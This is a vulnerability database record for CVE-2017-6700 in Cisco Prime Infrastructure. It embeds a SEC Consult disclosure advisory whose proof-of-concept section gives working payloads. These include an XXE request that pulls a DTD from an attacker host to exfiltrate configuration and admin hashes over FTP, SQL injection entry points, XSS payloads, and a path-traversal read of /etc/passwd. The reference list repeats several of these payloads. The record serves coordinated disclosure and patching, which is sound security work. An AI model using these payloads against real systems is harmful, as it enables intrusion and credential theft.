ID

VAR-201707-0910


CVE

CVE-2017-6700


TITLE

Cisco PI and EPNM of Web -Based scripting interface cross-site scripting vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2017-005308

DESCRIPTION

A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Evolved Programmable Network Manager (EPNM) could allow an unauthenticated, remote attacker to conduct a Document Object Model (DOM) based (environment or client-side) cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. More Information: CSCvc24620 CSCvc49586. Known Affected Releases: 3.1(1) 2.0(4.0.45B). Vendors have confirmed this vulnerability Bug ID CSCvc24620 , CSCvc49586 It is released as.Information may be obtained and information may be altered. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID's CSCvc24620 and CSCvc49586. PI is a set of wireless management solutions through Cisco Prime LAN Management Solution (LMS) and Cisco Prime Network Control System (NCS) technologies; EPNM is a set of network management solutions. SEC Consult Vulnerability Lab Security Advisory < 20170622-0 > ======================================================================= title: XML External Entity Injection (XXE), SQL Injection, Cross Site Scripting, Local File Disclosure product: Cisco Prime Infrastructure vulnerable version: 1.1 through 3.1.6 fixed version: 3.1.6 Update 1 (patch), 3.1.7 (future release) CVE number: CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700 impact: high homepage: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html found: 2016-11-21 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Cisco Systems, Inc. (known as Cisco) is an American multinational technology conglomerate headquartered in San JosA(c), California, that develops, manufactures, and sells networking hardware, telecommunications equipment, and other high-technology services and products. Through its numerous acquired subsidiaries, such as OpenDNS, Cisco Meraki, and Cisco Jasper, Cisco specializes into specific tech markets, such as Internet of Things (IoT), domain security, and energy management." Source: https://en.wikipedia.org/wiki/Cisco_Systems Business recommendation: ------------------------ SEC Consult recommends to install the latest patch to fix the identified vulnerabilities. Since SEC Consult only performed a short security crash test on this product it is highly recommended to perform a thorough security review as there are indications for further vulnerabilities. Vulnerability overview/description: ----------------------------------- SEC Consult was able to identify some serious vulnerabilities with the low privileged "monitor-only" user. 1) XML External Entity Injection (CVE-2017-6662) The used XML parser is resolving external XML entities which allows attackers to read files and send requests to systems on the internal network (e.g port scanning). The vulnerability can be exploited by a low privileged read-only user to read sensitive information files with malicious XML code. The hashed password of the local admin user can be accessed without authorization. 2) SQL Injection (CVE-2017-6698) The identified SQL injection vulnerability enables an authenticated attacker with low privileges to execute arbitrary SQL commands. 4) Local File Disclosure (no CVE assigned) Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: ----------------- 1) XML External Entity Injection (CVE-2017-6662) Login with a low privileged user and navigate to Settings > Export > select Format 'PDF' click 'Export'. Make sure the 'Chart' option is selected, this chart uses XML to build SVG images. POST /webacs/prime/ui/dashboard/renderer HTTP/1.1 Host: <CiscoPrimeHost> [...] output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE x [<!ENTITY %25 foo SYSTEM \"http://<AttackerHost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D $ cat sectest.dtd <!ENTITY % data SYSTEM "file:///storedconfig/active/startup-config"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>"> $ python -m SimpleHTTPServer 1234 $ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb $ ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.8.0_66@ > 230 more data please! < TYPE I > 230 more data please! < CWD ! > 230 more data please! < hostname <CiscoPrimeHost> [...] < ! > 230 more data please! < username admin password hash <AdminHashedPassword> > 230 more data please! < CWD role admin > 230 more data please! < ! [...] 2) SQL Injection (CVE-2017-6698) A low privileged user such as "monitor-only" user can read the admin's password hashes via SQL injection. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<SQL-Injection>&path=%2Froot Some vulnerable entry points require administrator privileges to exploit. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/<SQL-Injection>&ipAddress=/<SQL-Injection>&time=/<SQL-Injection>&auditDescription=/<SQL-Injection>&userGroup=/<SQL-Injection>&activeDomain=/<SQL-Injection> https://<CiscoPrimeHost>/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getJobDetails/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobs/<SQL-Injection>/Lightweight%20AP%20Operational%20Status Some URLs with this pattern are affected by the SQL injection vulnerability in the JSON field. https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.proxy/ (HTTP POST) { "items": [ "<SQL-Injection>", "ProxyPort", "ProxyUserName", "ProxyPassword", "isProxyEnabled", "isProxyAuthenticated" ] } https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.swim/ (HTTP POST) { "items": [ "<SQL-Injection>", "CCOPassword" ] } 3) Cross site scripting a) Reflected cross site scripting (CVE-2017-6699) https://<CiscoPrimeHost>/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=<img+src=x+onerror=alert(/XSS1/)>&confUrl=</ScR</ScRipT>ipT><img+src=x+onerror=alert(/XSS2/)> https://<CiscoPrimeHost>/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=</sc</script>ript><img+src=x+onerror=alert(/XSS1/)>&jobResultPageId='><img+src=x+onerror=alert(/XSS2/)> b) DOM-based cross site scripting (CVE-2017-6700) https://<CiscoPrimeHost>/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=<ExistingTaskID>&jobName="><img src=x onerror=alert(/XSS/)>&pageSettings= https://<CiscoPrimeHost>/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=<ExistingJobId>&lastRunResultState=Success&jobId=<ExistingJobId>&jobName=Mobility Service Status&jobBreadcrumName="><img src=x onerror=alert(/XSS/)> 4) Local File Disclosure The attacker must be in the super users or admin group in order to exploit this vulnerability. https://<CiscoPrimeHost>/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd GET /webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: <CiscoPrimeHost> [...] HTTP/1.1 200 OK Cache-Control: private Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Disposition: attachement; filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip" Content-Type: application/zip [...] $ unzip _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip Archive: _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../../../../../../../etc/passwd inflating: etc/passwd $ cat etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt [...] Vulnerable / tested versions: ----------------------------- According to information provided by Cisco, the following versions are affected: 1.1 through 3.1.6 SEC Consult tested the following versions which were the most recent ones at the time of discovery: * 3.1.0.0.70 * 3.1.0.0.132 incl. 3.1.4 patch Vendor contact timeline: ------------------------ 2016-11-23: Contacting vendor through psirt@cisco.com. 2016-11-23: Initial response from Cisco PSIRT. 2016-11-24: Additional vulnerabilities added. 2016-12-14: Cisco proposed target date for the fixes for March 2017. 2017-03-03: Cisco postponed target date for the fixes to 31 May 2017. 2017-05-16: Cisco postponed target date for the fixes to 21 June 2017. 2017-06-14: CVEs are assigned to the vulnerabilities. 2017-06-21: Patches available 2017-06-22: Coordinated release of security advisory. Solution: --------- Install the patch version 3.1.6 Update 1. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Pichaya Morimoto / @2017

Trust: 2.07

sources: NVD: CVE-2017-6700 // JVNDB: JVNDB-2017-005308 // BID: 99216 // VULHUB: VHN-114903 // PACKETSTORM: 143111

AFFECTED PRODUCTS

vendor:ciscomodel:prime infrastructurescope:eqversion:2.0\(4.0.45b\)

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1\(1\)

Trust: 1.6

vendor:ciscomodel:prime infrastructurescope: - version: -

Trust: 0.8

vendor:ciscomodel:prime infrastructurescope:eqversion:3.1(1)

Trust: 0.3

vendor:ciscomodel:network level service 2.0scope: - version: -

Trust: 0.3

vendor:ciscomodel:evolved programmable network managerscope:eqversion:0

Trust: 0.3

sources: BID: 99216 // JVNDB: JVNDB-2017-005308 // CNNVD: CNNVD-201706-1007 // NVD: CVE-2017-6700

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-6700
value: MEDIUM

Trust: 1.0

NVD: CVE-2017-6700
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201706-1007
value: MEDIUM

Trust: 0.6

VULHUB: VHN-114903
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2017-6700
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-114903
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-6700
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-114903 // JVNDB: JVNDB-2017-005308 // CNNVD: CNNVD-201706-1007 // NVD: CVE-2017-6700

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-114903 // JVNDB: JVNDB-2017-005308 // NVD: CVE-2017-6700

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 143111 // CNNVD: CNNVD-201706-1007

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201706-1007

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-005308

PATCH

title:cisco-sa-20170621-piepnm4url:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170621-piepnm4

Trust: 0.8

title:Cisco Prime Infrastructure and Evolved Programmable Network Manager Fixes for cross-site scripting vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=71196

Trust: 0.6

sources: JVNDB: JVNDB-2017-005308 // CNNVD: CNNVD-201706-1007

EXTERNAL IDS

db:NVDid:CVE-2017-6700

Trust: 2.9

db:BIDid:99216

Trust: 2.0

db:SECTRACKid:1038751

Trust: 1.1

db:JVNDBid:JVNDB-2017-005308

Trust: 0.8

db:CNNVDid:CNNVD-201706-1007

Trust: 0.7

db:NSFOCUSid:36953

Trust: 0.6

db:VULHUBid:VHN-114903

Trust: 0.1

db:PACKETSTORMid:143111

Trust: 0.1

sources: VULHUB: VHN-114903 // BID: 99216 // JVNDB: JVNDB-2017-005308 // PACKETSTORM: 143111 // CNNVD: CNNVD-201706-1007 // NVD: CVE-2017-6700

REFERENCES

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm4

Trust: 2.1

url:http://www.securityfocus.com/bid/99216

Trust: 1.7

url:http://www.securitytracker.com/id/1038751

Trust: 1.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6700

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6700

Trust: 0.8

url:http://www.nsfocus.net/vulndb/36953

Trust: 0.6

url:http://www.cisco.com/

Trust: 0.3

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm1

Trust: 0.1

url:https://<ciscoprimehost>/webacs/loginaction.do?action=login&product=wcs&selectedcategory=en#pageid=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceload=true&jobtype=infrastructure&workstate=scheduled&parenttype=usrdefined&lastrunjobid=<existingjobid>&lastrunresultstate=success&jobid=<existingjobid>&jobname=mobility

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categorypath=<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/index_abs.jsp?theme=prime#pageid=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskid=<existingtaskid>&jobname="><img

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6699

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/preferences/systempreferencesfornode/default.swim/

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/pi_recent_links?categorypath=global%2fpi_recent_links<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getalljobs/<sql-injection>/lightweight%20ap%20operational%20status

Trust: 0.1

url:https://bst.cloudapps.cisco.com/bugsearch/bug/cscvc49548

Trust: 0.1

url:https://www.sec-consult.com/en/career.htm

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/preferences/systempreferencesfornode/default.proxy/

Trust: 0.1

url:http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/pi_home_page_selection?categorypath=<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/applications/common/jsp/systempreferences_configurable.jsp?taskname=<img+src=x+onerror=alert(/xss1/)>&confurl=</scr</script>ipt><img+src=x+onerror=alert(/xss2/)>

Trust: 0.1

url:https://en.wikipedia.org/wiki/cisco_systems

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/userservice/getauditrecordsforgivenrange/?username=/<sql-injection>&ipaddress=/<sql-injection>&time=/<sql-injection>&auditdescription=/<sql-injection>&usergroup=/<sql-injection>&activedomain=/<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/dashboard_config:com_cisco_xmp_web_page_smartlicense_dashboard?categorypath=<sql-injection>

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm2

Trust: 0.1

url:https://twitter.com/sec_consult

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6662

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categorypath=<sql-injection>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/applications/inventory/html/importjobresults.jsp?taskid=</sc</script>ript><img+src=x+onerror=alert(/xss1/)>&jobresultpageid='><img+src=x+onerror=alert(/xss2/)>

Trust: 0.1

url:https://<ciscoprimehost>/webacs/packetcaptureaction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd

Trust: 0.1

url:https://bst.cloudapps.cisco.com/bugsearch/bug/cscvc25573

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<sql-injection>&path=%2froot

Trust: 0.1

url:http://<attackerhost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"devices,\"","title"%3a"","timestamp"%3a""}],"nobrandingdata"%3atrue,"locale"%3a"en"}&pdfoptions=%7b%22table%22%3atrue%2c%22chart%22%3atrue%7d

Trust: 0.1

url:https://<ciscoprimehost>/webacs/inventoryrestservice/ifm/inventory-rest/getimporttaskstatusdto/<sql-injection>

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getjobdetails/<sql-injection>

Trust: 0.1

url:https://www.sec-consult.com/en/vulnerability-lab/advisories.htm

Trust: 0.1

url:https://www.sec-consult.com/en/about/contact.htm

Trust: 0.1

url:https://raw.githubusercontent.com/onsec-lab/scripts/master/xxe-ftp-server.rb

Trust: 0.1

url:https://<ciscoprimehost>/webacs/rs/json/jobschedulerservice/getalljobsctr/infrastructure/<sql-injection>

Trust: 0.1

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170621-piepnm3

Trust: 0.1

url:https://software.cisco.com/download/release.html?mdfid=286304360&catid=268439477&softwareid=284272933&release=3.1.6&relind=available&rellifecycle=&reltype=latest

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2017-6698

Trust: 0.1

sources: VULHUB: VHN-114903 // BID: 99216 // JVNDB: JVNDB-2017-005308 // PACKETSTORM: 143111 // CNNVD: CNNVD-201706-1007 // NVD: CVE-2017-6700

CREDITS

Pichaya Morimoto (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab

Trust: 0.9

sources: BID: 99216 // CNNVD: CNNVD-201706-1007

SOURCES

db:VULHUBid:VHN-114903
db:BIDid:99216
db:JVNDBid:JVNDB-2017-005308
db:PACKETSTORMid:143111
db:CNNVDid:CNNVD-201706-1007
db:NVDid:CVE-2017-6700

LAST UPDATE DATE

2024-11-23T22:38:28.100000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-114903date:2017-07-07T00:00:00
db:BIDid:99216date:2017-06-21T00:00:00
db:JVNDBid:JVNDB-2017-005308date:2017-07-26T00:00:00
db:CNNVDid:CNNVD-201706-1007date:2017-07-04T00:00:00
db:NVDid:CVE-2017-6700date:2024-11-21T03:30:20.077

SOURCES RELEASE DATE

db:VULHUBid:VHN-114903date:2017-07-04T00:00:00
db:BIDid:99216date:2017-06-21T00:00:00
db:JVNDBid:JVNDB-2017-005308date:2017-07-26T00:00:00
db:PACKETSTORMid:143111date:2017-06-22T23:23:23
db:CNNVDid:CNNVD-201706-1007date:2017-06-23T00:00:00
db:NVDid:CVE-2017-6700date:2017-07-04T00:29:00.307